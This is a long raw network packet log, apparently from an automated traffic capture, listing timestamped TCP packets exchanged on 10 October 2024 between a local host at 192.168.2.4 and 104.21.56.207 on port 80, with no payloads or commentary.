                                                                                                        Oct 10, 2024 08:57:26.665946960 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.665972948 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.665988922 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.669639111 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669651985 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669692993 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.669698954 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669711113 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669722080 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669734955 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669739008 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.669759989 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669771910 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669779062 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.669785976 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669815063 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.669840097 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669852018 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669862986 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669874907 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669883013 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.669887066 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669898987 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.669905901 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.669936895 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670093060 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670104027 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670115948 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670142889 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670144081 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670155048 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670181036 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670205116 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670218945 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670232058 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670243025 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670279980 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670304060 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670322895 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670334101 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670341015 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670346022 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670357943 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670367956 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670380116 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670392990 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670550108 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670562029 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670572996 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670593977 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670617104 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670630932 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670643091 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670655966 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670661926 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670674086 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670685053 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670686007 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670696974 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670711040 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670727968 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670739889 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670754910 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670768023 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670774937 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670780897 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670793056 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670802116 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670805931 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670816898 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670818090 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670831919 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.670838118 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.670865059 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.671180010 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671191931 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671204090 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671247005 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.671281099 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671291113 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671303034 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671314001 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671318054 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.671328068 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671339989 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671348095 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.671351910 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671364069 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.671370029 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.671399117 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.726210117 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751425982 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751449108 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751460075 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751471043 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751482010 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751492023 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751504898 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751508951 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751534939 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751538992 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751540899 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751543045 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751544952 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751549006 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751554966 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751569986 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751574039 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751588106 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751589060 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751600981 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751605034 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751619101 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751630068 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751636982 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751641035 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751660109 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751763105 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751773119 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751789093 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751797915 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751799107 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751811981 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751821995 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751823902 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751833916 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751840115 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751844883 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751857042 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751866102 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751868010 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751878977 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751888037 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751908064 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.751935959 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751941919 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.751951933 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752008915 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752057076 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752068043 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752077103 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752087116 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752098083 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752099037 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752108097 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752119064 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752120972 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752141953 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752151966 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752161980 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752162933 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752191067 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752218008 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752228022 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752244949 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752254963 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752259970 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752311945 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752338886 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752348900 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752358913 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752368927 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752378941 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752382040 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752408028 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752443075 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752454042 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752475977 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752480030 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752485991 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752497911 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752512932 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752525091 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752531052 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752538919 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752553940 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752568007 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752588034 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752621889 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752631903 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752644062 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752671957 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752675056 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752681971 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752692938 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752702951 CEST8049730104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:26.752727032 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752753019 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:26.752772093 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:31.248039007 CEST4973080192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:58.503078938 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:58.508404970 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:58.508609056 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:58.508688927 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:58.513998032 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210412025 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210511923 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210546017 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210563898 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210581064 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210598946 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210630894 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210652113 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210666895 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210681915 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.210733891 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.210733891 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.210783005 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.215584040 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.215609074 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.215661049 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.215703964 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.296964884 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.297009945 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.297051907 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.297070026 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.297090054 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.297106981 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.297138929 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.297319889 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.297319889 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.297782898 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298015118 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298068047 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.298069000 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298104048 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298136950 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298168898 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298244953 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.298244953 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.298244953 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.298244953 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.298244953 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.298876047 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298908949 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298943996 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.298975945 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.299009085 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.299065113 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.299122095 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.299654007 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.299685955 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.299720049 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.299729109 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.299751997 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.299755096 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.299782991 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.299806118 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.343621969 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.343672037 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.343709946 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.343925953 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.343925953 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.384115934 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384186983 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384216070 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384238005 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384255886 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384288073 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384321928 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384326935 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.384356022 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384360075 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.384390116 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384423018 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384457111 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384491920 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384526014 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.384548903 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.384548903 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.384548903 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.384548903 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.384548903 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.384589911 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.385401964 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.385436058 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.385463953 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.385468960 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.385499954 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.385500908 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.385525942 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.385535002 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.385554075 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.385566950 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.385588884 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.385603905 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.385622025 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.385654926 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.386085033 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.386142015 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.386187077 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.386245966 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.386301041 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.386333942 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.386358023 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.386369944 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.386389017 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.386403084 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.386424065 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.386436939 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.386451006 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.386491060 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.387150049 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.387201071 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.387204885 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.387234926 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.387254000 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.387265921 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.387289047 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.387299061 CEST8049737104.21.56.207192.168.2.4
                                                                                                        Oct 10, 2024 08:57:59.387319088 CEST4973780192.168.2.4104.21.56.207
                                                                                                        Oct 10, 2024 08:57:59.387331009 CEST8049737104.21.56.207192.168.2.4
